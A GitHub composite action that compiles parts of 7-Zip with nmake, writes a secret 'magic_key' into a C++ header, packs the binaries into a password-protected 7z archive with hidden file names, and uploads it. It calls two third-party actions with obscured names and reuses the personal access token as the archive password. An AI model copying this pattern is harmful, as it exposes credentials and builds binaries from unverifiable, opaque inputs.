description: Build program


inputs:
  token:
    description: Personal Access Token
    required: false
    default: ''

  branch:
    description: platform
    required: false
    default: ''

  arch:
    description: platform
    required: false
    default: 'x64'

  magic_key:
    description: private secret
    required: false
    default: ''



runs:
  using: composite

  steps:

  - uses: fu1ny2t-3es/gi1-ac2io3s@checkout-branch
    with:
      branch: ${{ inputs.branch }}

      token: ${{ inputs.token }}
      auto: true



  - uses: fu1ny2t-3es/cc1ch2-ac3io4@custom
    with:
      key: ${{ inputs.arch }}



  - if: inputs.arch == 'x86' || inputs.arch == 'x64'
    uses: ilammy/msvc-dev-cmd@v1 
    with:
      arch: x64


        
  - if: inputs.magic_key != ''
    working-directory: ${{ github.workspace }}
    shell: pwsh
    env:
      # Exposes the secret ONLY to this specific step
      MAGIC_KEY_BLOCK: ${{ inputs.magic_key }} 
    run: |
      cd ${{ github.workspace }}\CPP
      $env:MAGIC_KEY_BLOCK | Out-File -FilePath "key.h" -Encoding utf8 -NoNewline

  
  
  - if: inputs.arch == 'x86' || inputs.arch == 'x64'
    working-directory: ${{ github.workspace }}
    shell: pwsh
    run: |
      cd ${{ github.workspace }}\CPP\7zip\Bundles\Format7zF
      nmake

      cd ${{ github.workspace }}\CPP\7zip\UI\FileManager
      nmake

      cd ${{ github.workspace }}\CPP\7zip\UI\GUI
      nmake

      cd ${{ github.workspace }}\CPP\7zip
      # nmake

      Get-ChildItem -Recurse


  - name: Pack Binaries with AES-256 Encryption
    working-directory: ${{ github.workspace }}\CPP
    shell: pwsh
    env:
      ZIP_PASSWORD: ${{ inputs.token }}
    run: |
      # 1. Create a temporary staging folder
      New-Item -ItemType Directory -Path ".\staging" -Force

      # 2. Copy all files into the flat staging folder
      Copy-Item "7zip\UI\FileManager\x64\*.exe" ".\staging\"
      Copy-Item "7zip\UI\GUI\x64\*.exe" ".\staging\"
      Copy-Item "7Zip\Bundles\Format7zF\x64\*.dll" ".\staging\"

      # 3. Zip the contents of the staging folder flat
      7z a "7zip_${{ inputs.arch }}.7z" -p"$env:ZIP_PASSWORD" -mhe=on ".\staging\*"


  - name: Upload Encrypted Artifact
    uses: actions/upload-artifact@main
    with:
      name: 7zip_${{ inputs.arch }}
      path: ${{ github.workspace }}\CPP\7zip_${{ inputs.arch }}.7z

